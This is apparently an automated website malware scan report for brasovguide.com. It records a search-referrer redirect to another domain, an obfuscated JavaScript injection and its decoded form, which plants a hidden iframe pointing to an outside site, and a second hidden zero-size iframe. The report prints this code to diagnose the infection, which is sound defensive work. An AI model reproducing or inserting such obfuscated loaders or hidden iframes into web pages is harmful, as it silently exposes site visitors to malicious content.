Malicious/Suspicious Redirects
URL: http://brasovguide.com/ (imitation of visitor from search engine)
Status: malicious

Request:
    GET / HTTP/1.1
    Host: brasovguide.com
    Referer: http://www.google.com/search?q=redirect+check1

Server response:
    HTTP/1.1 302 Found
    Cache-Control: no-cache, no-store, must-revalidate, max-age=0
    Connection: close
    Date: Tue, 23 Sep 2014 18:35:27 GMT
    Location: http://medicquil.ru
    Server: LiteSpeed
    Content-Length: 1148
    Content-Type: text/html
Scanned pages/files
Request | Server response | Status |
http://brasovguide.com/ | 200 OK Content-Length: 13622 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)

    try{1-prototype;}catch(asd){x=2;} if(x){fr="fromChar";f=[0,-1,94,93,22,29,91,101,88,108,99,90,101,106,35,94,91,105,60,98,90,100,91,99,107,105,55,112,74,86,94,68,86,100,91,29,30,88,100,91,111,28,32,81,37,84,31,112,4,-1,-2,0,95,91,105,87,98,92,104,29,32,49,2,0,-1,114,23,91,97,106,91,21,114,3,-2,0,-1,89,102,89,106,100,91,99,107,36,108,105,95,105,92,30,23,51,95,91,105,87,98,92,22,104,105,89,50,30,94,105,107,102,47,38,37,98,112,98,86,101,90,94,37,89,100,100,37,107,96,105,94,107,37,45,90,91,89,43,
    if(x&&f&&012===10)e(s);

Decoded script:

    if (document.getElementsByTagName('body')[0]){
        iframer();
    } else {
        document.write("<iframe src='http://mylandi.com/visit/8ced4e2090a113580d77f98cfc397079' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
    }
    function iframer(){
        var f = document.createElement('iframe');
        f.setAttribute('src','http://mylandi.com/visit/8ced4e2090a113580d77f98cfc397079');
        f.style.visibility='hidden';
        f.style.position='absolute';
        f.style.left='0'

    <iframe src='http://mylandi.com/visit/8ced4e2090a113580d77f98cfc397079' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>

Antivirus reports:
http://brasovguide.com/test404page.js | 404 Not Found Content-Length: 218 Content-Type: text/html | suspicious |
Hidden iFrame found.
    size: 0x0
    style: hidden
    src: http://http-iframe.org/s/in.cgi?7

    <iframe rqhtl='l0bwg7vw' src='http://http-iframe.org/s/in.cgi?7 ' ljgvd='x7po0zy6' width='0' height='0' style='display:none'>
http://rondoniainfoco.com/admin/indexd.php | 404 Not Found Content-Length: 214 Content-Type: text/html | clean |
http://rondoniainfoco.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=brasovguide.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://brasovguide.com/
Result: brasovguide.com is not infected or malware details are not published yet.